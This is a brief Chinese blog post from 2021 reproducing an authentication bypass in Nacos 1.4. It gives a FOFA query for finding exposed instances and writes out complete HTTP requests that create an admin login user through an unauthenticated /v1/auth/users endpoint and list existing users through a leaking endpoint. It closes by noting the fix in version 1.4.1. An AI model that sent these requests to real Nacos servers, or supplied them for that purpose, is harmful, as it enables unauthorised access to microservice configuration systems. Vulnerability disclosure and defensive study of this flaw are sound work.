Nacos 认证绕过

Nacos 介绍

Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。 Nacos 是构建以“服务”为中心的现代应用架构 (例如微服务范式、云原生范式) 的服务基础设施。

 

漏洞成因:

1、未授权访问接口,可以创建登录用户 

2、严格意义上来说,还有一个接口,属于敏感信息泄露漏洞

漏洞影响:

1.4版本

漏洞复现:

FOFA语法:title="nacos"

 

 

通过未授权接口创建用户

POST /v1/auth/users?username=test&password=test123 HTTP/1.1
Host: 47.108.000.000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: https://47.108.000.000
Connection: close
Referer: https://47.108.000.000/

 

 

通过信息泄漏的接口查询用户是否创建成功

GET /v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
Host: 47.108.000.000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: https://47.108.000.000
Connection: close
Referer: https://47.108.000.000/

 

 

漏洞验证

使用创建的系统登录系统

 

 

漏洞补丁:

1.4.1 官网已经修复了该漏洞。

 

 

posted @ 2021-04-24 16:31  APT-101  阅读(773)  评论(0编辑  收藏  举报